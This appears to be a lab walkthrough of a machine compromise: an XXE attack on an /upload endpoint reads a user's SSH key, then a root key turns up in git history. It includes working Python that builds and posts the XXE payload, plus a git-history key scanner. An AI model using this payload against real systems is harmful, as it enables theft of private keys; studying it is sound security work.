Nmap scan:
There's only one port open on this machine.
On port 5000, this is what we see:
We can use gobuster on this to find more directories.
/feed would bring us here:
The hint about XML injection is helpful here. I noticed that uploading a file through this API sends a POST request to the /upload endpoint, with the file carried as HTTP form data.
However, sending any XML file I created only returned an Internal Server Error. It turns out the endpoint expects specific elements to be present:
With those elements wrapped in a root tag, the uploads start going through.
From the response, we learn that there is a user called roosa. We can then try a basic XXE payload (an external entity pointing at a local file, referenced from one of the required elements) to read that user's private SSH key.
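 
As an added example (not part of the original write-up), the Python below builds an XXE payload in the shape described above and shows, against a local file, what the server-side parser does with it when external entities are resolved versus when they are not. The wrapper tag, the element names Author/Subject/Content, the form field name, the target URL and the key path /home/roosa/.ssh/id_rsa are all assumptions; the real element names are whichever ones the endpoint requires.

```python
"""Added example (not from the original write-up): build an XXE file-read
payload for the /upload endpoint and show what a parser that resolves
external entities does with it. Wrapper tag, element names, form field,
URL and key path are assumptions."""
import io
import os
import tempfile
import urllib.request
import uuid
import xml.sax
from xml.sax.handler import feature_external_ges

WRAPPER = "upload"                              # assumed root tag
REQUIRED = ("Author", "Subject", "Content")     # assumed required elements
KEY_PATH = "/home/roosa/.ssh/id_rsa"            # assumed location of roosa's key
UPLOAD_URL = "http://target:5000/upload"        # placeholder host, port from the scan

# Constructed stand-in for the private key; not real key material.
CONSTRUCTED_KEY = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "MIIEpAIBAAKCAQEAthisisnotarealkeyjustconstructedsampledata\n"
    "-----END RSA PRIVATE KEY-----\n"
)


def build_xxe_payload(target_path, into=REQUIRED[0]):
    """Return XML that declares an external entity for target_path and
    references it inside one required element, so a parser that resolves
    external entities copies the file's contents into that element."""
    fields = "".join(
        f"<{name}>{'&xxe;' if name == into else 'test'}</{name}>"
        for name in REQUIRED
    )
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {WRAPPER} [<!ENTITY xxe SYSTEM "file://{target_path}">]>\n'
        f"<{WRAPPER}>{fields}</{WRAPPER}>\n"
    )


class _TextCollector(xml.sax.ContentHandler):
    """Collect all character data, which is where entity content lands."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_like_server(xml_text, resolve_external_entities):
    """Parse xml_text with the stdlib SAX parser; the feature flag is the
    difference between a vulnerable parser and a hardened one."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.StringIO(xml_text))
    return "".join(handler.parts)


def demo():
    """Write the constructed key to a temp file (standing in for KEY_PATH)
    and return (text seen by a resolving parser, text seen by a safe one)."""
    with tempfile.NamedTemporaryFile("w", delete=False, suffix=".key") as fh:
        fh.write(CONSTRUCTED_KEY)
    try:
        payload = build_xxe_payload(fh.name)
        leaked = parse_like_server(payload, resolve_external_entities=True)
        safe = parse_like_server(payload, resolve_external_entities=False)
    finally:
        os.unlink(fh.name)
    return leaked, safe


def upload(url, payload, field="file", filename="feed.xml"):
    """POST the payload as multipart form data, the way the upload form
    does. The field name is an assumption. Not exercised by demo()."""
    boundary = uuid.uuid4().hex
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: text/xml\r\n\r\n" + payload + f"\r\n--{boundary}--\r\n"
    ).encode()
    req = urllib.request.Request(
        url, data=body, headers={"Content-Type": f"multipart/form-data; boundary={boundary}"}
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    leaked, safe = demo()
    print("resolving parser returned:\n" + leaked)
    print("hardened parser returned: " + repr(safe))
    print("payload for the target:\n" + build_xxe_payload(KEY_PATH))
```

Against the real box you would call upload(UPLOAD_URL, build_xxe_payload(KEY_PATH)) and read the key out of the reflected Author element; the local demo exists so the entity expansion can be checked without a target.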
Afterwards, we can simply SSH into the machine.
Checking the id of this user, we see that we are part of the sudo group.
Within the home directory of the user, we also find some Git repository files.
Using find /home -name .git, we can locate the Git repository and read its logs.
In that directory, git log -p -2 shows the diffs of the last two commits, and an SSH private key appears in one of them:
Surprisingly, this was the root SSH key. Secrets committed to a repository stay readable in its history even after the file is removed, which is why the log is worth checking.
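As an added example (not code from the original write-up), this Python scans git log -p output for private key blocks and reports the commit, file path and whether the key was added or removed in each one, which is the general form of what the two-commit log above showed. The sample log is constructed, with made-up hashes, paths and key material.

```python
"""Added example (not from the original write-up): find private keys in
git history by scanning `git log -p` output. The sample log below is
constructed; hashes, paths and key bytes are made up."""
import re
import subprocess

BEGIN = re.compile(r"^([+-])(-----BEGIN [A-Z ]*PRIVATE KEY-----)$")
END = re.compile(r"^[+-]-----END [A-Z ]*PRIVATE KEY-----$")

# Constructed sample: newest commit first, as git prints it. The key is
# deleted in the newer commit but still fully visible in the diff.
SAMPLE_LOG = """\
commit b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1
Author: roosa <roosa@localhost>
Date:   Tue Jan 1 12:00:00 2019 +0000

    remove key from repo

diff --git a/config/deploy.key b/config/deploy.key
deleted file mode 100644
index 1111111..0000000
--- a/config/deploy.key
+++ /dev/null
@@ -1,4 +0,0 @@
------BEGIN RSA PRIVATE KEY-----
-MIIEpAIBAAKCAQEAconstructedkeymaterialnotreal
-AAAAconstructedkeymaterialnotreal0000
------END RSA PRIVATE KEY-----
commit a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
Author: roosa <roosa@localhost>
Date:   Mon Dec 31 12:00:00 2018 +0000

    add deploy key

diff --git a/config/deploy.key b/config/deploy.key
new file mode 100644
index 0000000..1111111
--- /dev/null
+++ b/config/deploy.key
@@ -0,0 +1,4 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEpAIBAAKCAQEAconstructedkeymaterialnotreal
+AAAAconstructedkeymaterialnotreal0000
+-----END RSA PRIVATE KEY-----
"""


def find_private_keys(log_text):
    """Walk `git log -p` text and return one finding per key block:
    {"commit", "path", "change" ("added"/"removed"), "key"}."""
    findings = []
    commit = path = None
    current = None  # (diff sign, key lines) while inside a key block
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("diff --git "):
            path = line.split(" b/", 1)[1]  # "diff --git a/x b/x" -> "x"
        elif current is None:
            m = BEGIN.match(line)
            if m:
                current = (m.group(1), [m.group(2)])
        else:
            sign, lines = current
            if line[:1] != sign:
                current = None  # block interrupted by context/other side
                continue
            lines.append(line[1:])
            if END.match(line):
                findings.append({
                    "commit": commit,
                    "path": path,
                    "change": "added" if sign == "+" else "removed",
                    "key": "\n".join(lines),
                })
                current = None
    return findings


def scan_repo(repo_dir):
    """Run git log -p over every ref of repo_dir and scan the output.
    Requires git on PATH; not used by the sample run below."""
    out = subprocess.run(
        ["git", "-C", repo_dir, "log", "-p", "--all"],
        capture_output=True, text=True, check=True,
    ).stdout
    return find_private_keys(out)


if __name__ == "__main__":
    for f in find_private_keys(SAMPLE_LOG):
        print(f"{f['commit'][:12]} {f['change']:7} {f['path']}")
        print(f["key"])
```

On a real checkout, scan_repo(".") does what reading git log -p -2 by hand did here, but over the whole history of every branch rather than the last two commits.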